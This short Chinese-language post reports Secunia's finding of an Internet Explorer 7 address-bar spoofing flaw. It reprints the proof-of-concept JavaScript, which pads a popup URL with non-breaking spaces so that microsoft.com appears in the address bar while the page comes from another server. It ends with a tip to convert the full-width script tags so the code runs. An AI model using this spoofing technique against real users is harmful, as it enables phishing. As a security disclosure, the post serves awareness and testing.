Internet Explorer 7 缺陷:地址栏欺骗测试

安全研究组织Secunia发现了Internet Explorer 7的最新缺陷,这回可是铁板钉钉的缺陷问题,这个问题出在IE7的地址栏上,它可能会被恶意代码利用,打开任意一个站点,但地址却是另一个站点,这样一来很容易引发钓鱼攻击,这里还提供了攻击示例,这里打开的microsoft.com实际上是在Secunia的服务器上。

访问:Internet Explorer 7 Popup Address Bar Spoofing Test

测试代码：
<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now - Left Click On This Link</font></a></div><br /><br /><Ｓｃｒｉｐｔ language="JavaScript"><br />function StartTest()<br />{<br /> var padding = '';<br /> for ( i=0 ; i<108 ; i++)<br /> {<br /> padding += unescape("%A0");<br /> }<br /> newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");<br /> newWindow.moveTo( (screen.width-325) , 0 );<br /> newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;<br /> document.location = "http://www.microsoft.com/windows/ie/default.mspx";<br />}<br /></Ｓｃｒｉｐｔ>　

需将Ｓｃｒｉｐｔ改成半角。